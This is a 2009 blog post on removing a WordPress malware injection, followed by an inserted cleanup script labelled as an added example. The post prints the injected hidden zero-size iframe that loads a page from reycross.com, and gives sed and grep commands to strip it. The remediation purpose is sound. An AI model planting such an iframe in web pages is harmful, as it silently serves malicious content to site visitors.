How to Remove reycross.com WordPress Malware

Tue, Sep 15, 2009

It seems that a new WordPress malware hijack is making the rounds and we got hit. Google just issued me a “this site contains malware” warning for my sites. After some quick investigation, it looks like the hijack has attached a malicious <iframe> block to the end of every HTML and PHP page in the site, so now I need to clean it out.

Luckily this is just like last time, and was easy to get rid of. I hope this tip helps someone else out as well.

This time, the iframe snippet that was getting added was:

<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Luckily, I had my old script lying around that systematically searches through all my files and removes the offending piece of crap from them. You can use this command to do the same:

find . -type f -name '*.*' -exec sed -i 's/<iframe src="http:\/\/reycross\.com\/laso\/s\.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;

Hope this helps anybody else getting sacked by this attack. I think it has to do with a theme vulnerability :(
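A more cautious variant of the cleanup above, as an added example that is not part of the original post: it first lists the files that contain the exact injected string, then strips it while keeping an untouched copy of each modified file for later inspection. The function names and the .infected suffix are assumptions made for this example, and GNU grep and sed are assumed.

```shell
#!/bin/sh
# Added example (not the author's script). The injected markup is copied from
# the post; function names and the ".infected" suffix are hypothetical.

# Exact injected string, used for fixed-string matching with grep -F.
INJECTED='<iframe src="http://reycross.com/laso/s.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'

# The same string as a sed regex: only the dots need escaping because the
# substitution below uses "|" as its delimiter instead of "/".
PATTERN='<iframe src="http://reycross\.com/laso/s\.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'

# list_infected DIR
# Dry run: print every file under DIR that contains the injected iframe.
# Copies saved by clean_infected are skipped so that a second run only
# reports files that still serve the iframe.
list_infected() {
    grep -rlF --exclude='*.infected' -- "$INJECTED" "$1" 2>/dev/null
}

# clean_infected DIR
# Remove the iframe from each file reported by list_infected. sed keeps the
# original as FILE.infected, which preserves the evidence and allows a
# rollback if a file is damaged. File names containing newlines are not handled.
clean_infected() {
    list_infected "$1" | while IFS= read -r f; do
        sed -i.infected "s|$PATTERN||g" "$f"
    done
}
```

Run list_infected on the web root first and review the output, then run clean_infected and confirm that a second list_infected prints nothing. Move the .infected copies out of the web root once you have finished with them, since they still contain the iframe.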


This post was written by:

Riyad Kalla - who has written 31 posts on kallasoft.

"Ultimately I just want to provide a resource that folks find useful."
